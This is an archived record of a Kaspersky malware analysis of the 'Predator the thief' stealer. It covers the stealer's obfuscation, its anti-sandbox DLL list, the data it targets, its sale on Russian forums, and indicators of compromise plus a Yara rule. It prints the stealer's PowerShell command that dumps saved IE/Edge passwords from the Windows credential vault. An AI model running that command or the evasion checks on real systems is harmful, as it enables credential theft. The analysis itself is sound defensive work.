{ "id": "8c937e48-f05f-4e61-808e-2a07c8a37724", "created_at": "2026-04-06T00:11:01.570508Z", "updated_at": "2026-04-10T03:36:48.242443Z", "deleted_at": null, "sha1_hash": "4d3ad4e1229a702178dbdef5acb4d800acebbba6", "title": "A predatory tale: Who’s afraid of the thief?", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1425296, "plain_text": "A predatory tale: Who’s afraid of the thief?\r\nBy GReAT\r\nPublished: 2019-03-11 · Archived: 2026-04-05 17:06:41 UTC\r\nIn mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who\r\ninitially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is\r\nthat it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was\r\napparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a\r\nC2 using a stealer dubbed ‘Predator’.\r\nAs soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory\r\ndumps, event logs, environment indicators from the network and so on and so forth. Finding very little information about\r\nthis tool, we decided that seeing as how we’d already dived into the stealer, we might as well share some of our main\r\nfindings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s\r\nversions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide\r\ngeneral information about its owners’ activities.\r\nAs well as all the information we collected from the client, we went the extra mile and contacted a source who had\r\npreviously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and\r\n2.3.7 in his blog just a few months ago (October 2018).\r\nHe joined Ido Naor, a principal security researcher at Kaspersky Lab and together they compiled a full analysis of the new\r\nversions of ‘Predator the thief’.\r\nThe blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. An account\r\nnamed Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries\r\nuntil fairly recently.\r\nPredator the thief\r\nPredator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has\r\nbeen detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly\r\nadapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim\r\nattack vector and are only selling the builder. For a small additional payment they can also generate an administration\r\npanel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a\r\nlittle-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for\r\ntriggers to show up.\r\nlatest version v3.0.7\r\nSample MD5 bf4cd781920f2bbe57e7e74a775b8e94\r\nCode Language C++\r\nFile Types PE\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 1 of 11\n\nSupported Arch. x86 and x64\r\nUnpacked Size \u003c500Kb\r\nAdmin Panel Example https://predatortop.xyz/login\r\nAdmin Panel Software PHP, Apache, Ubuntu\r\nFrom v2 to v3\r\nPredator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far\r\nas large companies go, protection solutions and response teams can detect and remove its activity in a relatively short\r\namount of time.\r\nThat said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to\r\nextend features and adjusting to client requirements and are generally not that aggressive when it comes to\r\ndisclosure/analysis of their tool.\r\nObfuscation\r\nPredator’s owners decided to obfuscate most of its code with a number of simple techniques. XOR, Base64, Substitutions,\r\nStack strings and more are being used to hide API methods, Folder paths, Register keys, the C2 server/Admin panel and\r\nso on.\r\nWe sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API\r\ncall, which we see as a bit like overkill considering the fact that other techniques can be applied to strip the obfuscation.\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 2 of 11\n\nWe’ve written down a list for those who are after a step-by-step guide:\r\nStep Description\r\n0 Saving arguments somewhere\r\n1 Get the function name\r\n2 Get the library name\r\n3 Recreating GetProcAddress\r\n4 Calling function by a simple register call\r\nExport table\r\nIt was also found that the export table trick for getting the API function is far more complex than the one introduced in v2:\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 3 of 11\n\nAnti-debugging/sandbox checks\r\nPredator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for\r\nexample, is a hardcoded list of DLLs that are checked if loaded into memory:\r\nsbiedll dbghelp api_log pstorec dir_watch vmcheck wpespy SxIn Sf2\r\nLoop for checking list of DLLs\r\nOne old trick, for example, that survived the version update is the check of Graphic Card Name introduced in v2.x.x.\r\nClassy but mandatory – browser stealer support\r\nEdge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, are different\r\nfrom the malware decision-making with the Gecko and Chromium browsers. In previous versions, Predator usually uses a\r\ntemporary file (*.col format file) to store browser content (in an SQLite3 database), but for Edge and IE it was replaced\r\nwith a hardcoded PowerShell command that will directly put the content of the file into a dedicated repository..\r\npowershell.exe -Command\r\n\"[void]\r\n[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 4 of 11\n\n= New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a =\r\n($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List\r\nResource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName\r\n:', 'Login:').Replace('Password :', 'Password:'); $c \u003e \"%PREDATOR_PATH%\\General\\IeEdgePasswords.txt\"\r\nAs a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’\r\nsales page:\r\nThe false keylogger feature\r\nThe owners of Predator list keylogger capabilities among its features, though a closer inspection of the code reveals that\r\nno keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer. The functionality includes a\r\ncrawler that checks if the clipboard contains data, grabs it and places it in a dedicated file the stealer owners have named\r\n‘information.log’.\r\nThief logs\r\nDiving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The\r\ninformation logger is perhaps the most important collector of Predator. It stores all the tasks performed by the stealer on\r\nthe victim machine.\r\nWe noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers,\r\nsuch as:\r\nHWID\r\nSystem Language\r\nKeyboard Layout\r\nAt the end of the report, the owners added a customer/payload ID – probably to improve support.\r\nUpdates\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 5 of 11\n\nPredator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its\r\npopularity. Here’s a summary of the new features in v3:\r\nLocation Data stolen\r\nGames\r\nOsu\r\nBattle.net\r\nFTP WinSCP\r\nVPN NordVPN\r\n2FA Authy\r\nMessengers\r\nPidgin\r\nSkype\r\nOperating System\r\nWebcam\r\nHWID\r\nClipboard\r\nSpecific document files (Grabber)\r\nProject filenames*\r\nBrowsers IE/Edge\r\n*We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files\r\nusually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.\r\nSale point (Russian forums)\r\nWe found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and\r\nthe content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you\r\nbanned if broken. The two sections (translated using Google) in the image below are examples of forbidden behavior.\r\nIt was also appears that each offer on the forum must go through a reviewer who decides if the piece of software or\r\nservice is of financial benefit to the forum administrators, but at the same time fair towards other members.\r\nFor 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles\r\n(~$1,500), the commission decreases to 10%.\r\nThe Predator stealer’s main sales thread was found here:\r\nhttps://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 6 of 11\n\nPredator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer\r\ninstall the C\u0026C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers\r\nare proactive in delivering updates and ensuring a fast and effective support service.\r\nTelegram as a service\r\nPredator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting\r\nover 370 members in this group:\r\nhttps://t.me/PredatorSoftwareChannel\r\nAnother update channel is the seller @sett9.\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 7 of 11\n\nIt appears the Predator administrators are demonstrating FUD capabilities by running a sample generated by the builder of\r\ntheir stealer. However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products\r\nas: Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by\r\nheuristics.\r\nhttps://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992\r\nhttps://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0\r\nThe executables above were not found in VirusTotal. According to the group, the links were posted around August of last\r\nyear (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 8 of 11\n\nOn the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the\r\nowners’ release notes, it was implemented with WinSCP and NordVPN support.\r\nIOCs\r\nIP/Domains:\r\nPredator version IP/Domain\r\nv3.0.3 15charliescene15[.]myjino[.]ru\r\nv3.0.4 axixaxaxu1337[.]us\r\nv3.0.5 madoko[.]jhfree[.]net\r\nv3.0.6 kristihack46[.]myjino[.]ru\r\nv3.0.7 j946104[.]myjino[.]ru\r\nHashes:\r\nPredator version MD5 Hash\r\nv3.0.3 c44920c419a21e07d753ed607fb6d7ca\r\nv3.0.4 cf2273b943edd0752a09e90f45958c85\r\nv3.0.5 b2cbb3d80c8d830a3b3c2bd568ba1826\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 9 of 11\n\nv3.0.6 dff67a78bb4866f9da5a0c1781ed5348\r\nv3.0.7 25F9EC882EAC441D4852F92E0EAB8595\r\nYara:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\nrule Predator_The_Thief : Predator_The_Thief {\r\n   meta:\r\n       description = \"Yara rule for Predator The Thief 3.0.0+\"\r\n       author = \"Fumik0_\"\r\n       date = \"2018/10/12\"\r\n       update = \"2019/02/26\"\r\n   strings:\r\n       $mz = { 4D 5A }\r\n       /*\r\n           Predator V3.0.0+\r\n       */\r\n       $x1 = { C6 84 24 ?? ?? 00 00 8C }\r\n       $x2 = { C6 84 24 ?? ?? 00 00 1A }\r\n       $x3 = { C6 84 24 ?? ?? 00 00 D4 }\r\n       $x4 = { C6 84 24 ?? ?? 00 00 03 }\r\n       $x5 = { C6 84 24 ?? ?? 00 00 B4 }\r\n       $x6 = { C6 84 24 ?? ?? 00 00 80 }\r\n       /*\r\n           Predator V3.0.3 -\u0026gt; 3.0.6\r\n       */\r\n       $y1 = { B8 00 E1 F5 05 }\r\n       $y2 = { 89 5C 24 0C }\r\n       $y3 = { FF 44 24 ?? }\r\n       $y4 = { 39 44 24 0C }\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 10 of 11\n\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n       $y5 = { BF 00 00 A0 00 }\r\n   condition:\r\n       $mz at 0 and\r\n       (\r\n            ( all of ($x*))\r\n            or\r\n            (all of ($y*))\r\n       )\r\n}\r\nSource: https://securelist.com/a-predatory-tale/89779\r\nhttps://securelist.com/a-predatory-tale/89779\r\nPage 11 of 11\n\n10 11 Predator V3.0.0+ */ \n12 $x1 = { C6 84 24 ?? ?? 00 00 8C }\n13 $x2 = { C6 84 24 ?? ?? 00 00 1A }\n14 $x3 = { C6 84 24 ?? ?? 00 00 D4 }\n15 $x4 = { C6 84 24 ?? ?? 00 00 03 }\n16 $x5 = { C6 84 24 ?? ?? 00 00 B4 }\n17 $x6 = { C6 84 24 ?? ?? 00 00 80 }\n18 /* \n19 Predator V3.0.3 -\u0026gt; 3.0.6 \n20 */ \n21 $y1 = { B8 00 E1 F5 05 } \n22 $y2 = { 89 5C 24 0C } \n23 $y3 = { FF 44 24 ?? } \n24 $y4 = { 39 44 24 0C } \n Page 10 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://securelist.com/a-predatory-tale/89779" ], "report_names": [ "89779" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434261, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4d3ad4e1229a702178dbdef5acb4d800acebbba6.pdf", "text": "https://archive.orkl.eu/4d3ad4e1229a702178dbdef5acb4d800acebbba6.txt", "img": "https://archive.orkl.eu/4d3ad4e1229a702178dbdef5acb4d800acebbba6.jpg" } }